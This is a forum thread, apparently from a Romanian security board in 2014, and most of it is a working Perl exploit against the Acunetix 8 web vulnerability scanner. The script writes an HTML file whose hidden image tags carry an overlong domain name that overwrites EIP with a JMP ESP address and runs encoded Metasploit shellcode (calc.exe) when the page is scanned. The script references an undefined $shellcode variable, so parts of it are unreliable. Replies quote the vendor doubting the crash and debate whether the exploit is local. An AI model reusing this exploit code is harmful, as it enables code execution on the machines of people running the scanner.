SirGod Posted April 24, 2014 Report Share Posted April 24, 2014 Have fun! # Exploit Title: Acunetix Stack Based overflow# Date: 24/04/14# Exploit Author: Danor Cohen (An7i) - http://an7isec.blogspot.co.il/2014/04/pown-noobs-acunetix-0day.html# Vendor Homepage: http://www.acunetix.com/# Software Link: http://www.acunetix.com/vulnerability-scanner/download/# Version: 8 build 20120704# Tested on: XP[B]#This exploit generates HTML file, if this HTML will be scanned with ACUNETIX, shell will be executed.[/B]my $file= "index.html";my $HTMLHeader1 = "<html>\r\n";my $HTMLHeader2 = "\r\n</html>";my $IMGheader1 = "<img style=\"opacity:0.0;filter:alpha(opacity=0);\" src=http://";my $IMGheader2 = "><br>\n";my $DomainName1 = "XSS";my $DomainName2 = "CSRF";my $DomainName3 = "DeepScan";my $DomainName4 = "NetworkScan";my $DomainName5 = "DenialOfService";my $GeneralDotPadding = "." x 190;my $ExploitDomain = "SQLInjection";my $DotPadding = "." x (202-length($ExploitDomain));my $Padding1 = "A"x66;my $Padding2 = "B"x4;my $FlowCorrector = "500f"; #0x66303035 : readable memory location for fixing the flowmy $EIPOverWrite = "]Qy~"; #0x7e79515d (JMP ESP from SXS.DLL).# windows/exec - 461 bytes# http://www.metasploit.com# Encoder: x86/alpha_upper# VERBOSE=false, PrependMigrate=false, EXITFUNC=thread,# CMD=calc.exemy $shellcode2 ="\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a" ."\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48" ."\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51" ."\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43" ."\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x39\x33\x30\x45\x50\x53" ."\x30\x33\x50\x4c\x49\x4a\x45\x46\x51\x48\x52\x52\x44\x4c" ."\x4b\x36\x32\x50\x30\x4c\x4b\x51\x42\x34\x4c\x4c\x4b\x51" ."\x42\x35\x44\x4c\x4b\x52\x52\x37\x58\x54\x4f\x48\x37\x51" ."\x5a\x57\x56\x50\x31\x4b\x4f\x46\x51\x4f\x30\x4e\x4c\x37" ."\x4c\x45\x31\x33\x4c\x45\x52\x36\x4c\x47\x50\x59\x51\x58" ."\x4f\x54\x4d\x53\x31\x49\x57\x4d\x32\x4c\x30\x50\x52\x46" ."\x37\x4c\x4b\x31\x42\x44\x50\x4c\x4b\x30\x42\x57\x4c\x45" ."\x51\x4e\x30\x4c\x4b\x57\x30\x34\x38\x4b\x35\x59\x50\x42" ."\x54\x31\x5a\x53\x31\x48\x50\x36\x30\x4c\x4b\x37\x38\x52" ."\x38\x4c\x4b\x46\x38\x51\x30\x43\x31\x49\x43\x4a\x43\x47" ."\x4c\x47\x39\x4c\x4b\x56\x54\x4c\x4b\x45\x51\x48\x56\x36" ."\x51\x4b\x4f\x56\x51\x39\x50\x4e\x4c\x39\x51\x38\x4f\x54" ."\x4d\x43\x31\x49\x57\x56\x58\x4b\x50\x43\x45\x4a\x54\x35" ."\x53\x53\x4d\x4b\x48\x57\x4b\x43\x4d\x57\x54\x34\x35\x5a" ."\x42\x31\x48\x4c\x4b\x56\x38\x37\x54\x33\x31\x48\x53\x32" ."\x46\x4c\x4b\x34\x4c\x50\x4b\x4c\x4b\x56\x38\x35\x4c\x43" ."\x31\x58\x53\x4c\x4b\x43\x34\x4c\x4b\x43\x31\x4e\x30\x4b" ."\x39\x51\x54\x31\x34\x56\x44\x51\x4b\x51\x4b\x43\x51\x36" ."\x39\x51\x4a\x30\x51\x4b\x4f\x4b\x50\x50\x58\x51\x4f\x30" ."\x5a\x4c\x4b\x54\x52\x4a\x4b\x4b\x36\x31\x4d\x33\x5a\x53" ."\x31\x4c\x4d\x4b\x35\x4f\x49\x55\x50\x35\x50\x35\x50\x46" ."\x30\x42\x48\x36\x51\x4c\x4b\x32\x4f\x4b\x37\x4b\x4f\x58" ."\x55\x4f\x4b\x4b\x50\x45\x4d\x36\x4a\x34\x4a\x43\x58\x4e" ."\x46\x4d\x45\x4f\x4d\x4d\x4d\x4b\x4f\x39\x45\x57\x4c\x43" ."\x36\x43\x4c\x44\x4a\x4d\x50\x4b\x4b\x4d\x30\x42\x55\x34" ."\x45\x4f\x4b\x30\x47\x54\x53\x34\x32\x42\x4f\x52\x4a\x33" ."\x30\x51\x43\x4b\x4f\x59\x45\x45\x33\x33\x51\x52\x4c\x35" ."\x33\x46\x4e\x35\x35\x53\x48\x52\x45\x45\x50\x41\x41";my $FinalDomainName1 = $IMGheader1.$DomainName1.$GeneralDotPadding.$IMGheader2;my $FinalDomainName2 = $IMGheader1.$DomainName2.$GeneralDotPadding.$IMGheader2;my $FinalDomainName3 = $IMGheader1.$DomainName3.$GeneralDotPadding.$IMGheader2;my $FinalDomainName4 = $IMGheader1.$DomainName4.$GeneralDotPadding.$IMGheader2;my $FinalDomainName5 = $IMGheader1.$DomainName5.$GeneralDotPadding.$IMGheader2;my $FinalExploitDomain = $IMGheader1.$ExploitDomain.$DotPadding.$Padding1.$FlowCorrector.$Padding2.$EIPOverWrite.$shellcode.$IMGheader2;open($FILE,">$file");print $FILE $HTMLHeader1.$FinalDomainName1.$FinalDomainName2.$FinalDomainName3.$FinalDomainName4.$FinalDomainName5.$FinalExploitDomain.$HTMLHeader2;close($FILE);print"Acunetix Killer File Created successfully\n"; Quote Link to comment Share on other sites More sharing options...
Nytro Posted April 24, 2014 Report Share Posted April 24, 2014 Genial Quote Link to comment Share on other sites More sharing options...
tpad Posted April 24, 2014 Report Share Posted April 24, 2014 (edited) acunetix39 minutes agoWe cannot reproduce this crash/code execution with any version of Acunetix WVS v8 or v9.However, we could reproduce the crash with some cracked versions of Acunetix WVS v8. In v8, the cracked replaced the executable with another executable.?It figures. Edited April 24, 2014 by tpad Quote Link to comment Share on other sites More sharing options...
sleed Posted April 24, 2014 Report Share Posted April 24, 2014 Foarte tare L-a testat cineva? ca eu nu am Acunetix Quote Link to comment Share on other sites More sharing options...
neox Posted April 26, 2014 Report Share Posted April 26, 2014 La prima vedere pare interesant dar nu este Remote exploit este un exploit local se vede clar crearea file index.htmlAn7i Security: Pwn the n00bs - Acunetix 0day ---> videoOri sunt eu batut in cap dar asta este local exploit .De exemplu exploitul asta de la exploit-db Acunetix 8 build 20120704 - Remote Stack Based Overflow Acunetix 8 build 20120704 arata ca un exploit remote dar tot asa "create file" foloseste payload ca calc si back-connect nu atac direct port sau alte minuni ca sa fie remote.In video asta tot asa create file . Eu zic ca asta este local exploit Quote Link to comment Share on other sites More sharing options...